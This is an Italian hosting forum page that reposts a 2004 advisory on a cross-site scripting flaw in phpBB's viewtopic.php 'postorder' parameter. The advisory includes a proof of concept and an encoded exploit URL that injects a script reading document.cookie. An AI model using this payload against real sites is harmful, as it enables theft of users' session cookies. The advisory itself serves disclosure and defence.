Torna indietro   Serverplan Forum > Serverplan comunica > Vulnerabilità
New phpBB ViewTopic.php Cross Site Scripting New phpBB ViewTopic.php Cross Site Scripting
Registrazione FAQ Lista utenti Calendario Cerca I messaggi di oggi Segna forums come letti

Rispondi
 
LinkBack Strumenti discussione Modalità visualizzazione
  #1 (permalink)  
Vecchio 29-02-2004, 01.44.34
Administrator
Amministratore
  
Data registrazione: 12-09-2002
Messaggi: 3,420
serverplan ha disabilitato la reputazione
Predefinito New phpBB ViewTopic.php Cross Site Scripting
################################################
Advisory Name:New phpBB ViewTopic.php Cross Site Scripting Vulnerability
Release Date: Feb 29,2004
Application: phpBB
Platform: PHP
Version Affected: the lastest version
Vendor URL: http://www.phpbb.com/
Discover: Cheng Peng Su(apple_soup_at_msn.com)
################################################

Details:
This vuln is similar to Arab VieruZ's advisory 'XSS bug in phpBB',this time the problem is not in 'highlight' ,but in 'postorder'.we can inject HTML code,such code could be used to steal cookie information.

Proof of Concept:
If there is a topic at
http://site/phpBB/viewtopic.php?t=123456
this page can be also viewed at
http://site/phpBB/viewtopic.php?t=123456&postorder=asc
then this page will contain code like below:
[Topic Title].
phpBB doesn't filter out illegal characters from 'postorder',so we can inject HTML code after 'postorder='.

Exploit:
URL: http://site/phpBB/viewtopic.php?t=12...69%70%74%3E%3C

note unescape('=%22%3E%3C%73%63%72%69%70%74%3E%61%6C%65 %72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%6 9%65%29%3C%2F%73%63%72%69%70%74%3E%3C') == '">&lt;script&gt;alert(document.cookie)&lt;/script&gt;<'

Contact:
Cheng Peng Su
apple_soup_at_msn.com
Class 1,Senior 2,High school attached to Wuhan University
Wuhan,Hubei,China
Rispondi citando
Rispondi

« Discussione precedente | Prossima discussione »
Strumenti discussione
Modalità visualizzazione
Modalità lineare Modalità lineare

Regole di scrittura
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts
BB code is Attivato
Le faccine sono Attivato
Il codice [IMG] è Attivato
Il codice HTML è Disattivato
Trackbacks are Attivato
Pingbacks are Attivato
Refbacks are Attivato


Discussioni simili
Discussione Autore discussione Forum Risposte Ultimo messaggio
hyip-catalog.com - hyip monitoring site! Monysik DISCUSSIONI OFF-TOPIC 0 05-07-2007 18.56.18
phyton e ssh per google site maps generator mjfan80 CGI - PERL - SCRIPT 1 31-01-2006 16.16.39
Phpbb 2.0.19 serverplan Vulnerabilità 0 30-12-2005 21.51.27
phpBB profile.php Cross Site Scripting Vulnerability serverplan Vulnerabilità 0 22-03-2004 21.10.41
Possible Cross Site Scripting in Discuz! Board serverplan Vulnerabilità 0 07-02-2004 10.43.07


Tutti gli orari sono GMT +1. Adesso sono le 13.11.07.

Contatta staff - Archivio - Inizio pagina

Powered by vBulletin versione 3.7.3
Copyright ©2000 - 2008, Jelsoft Enterprises Ltd.
Content Relevant URLs by vBSEO 3.1.0
Traduzione italiana : www.vbulletin.it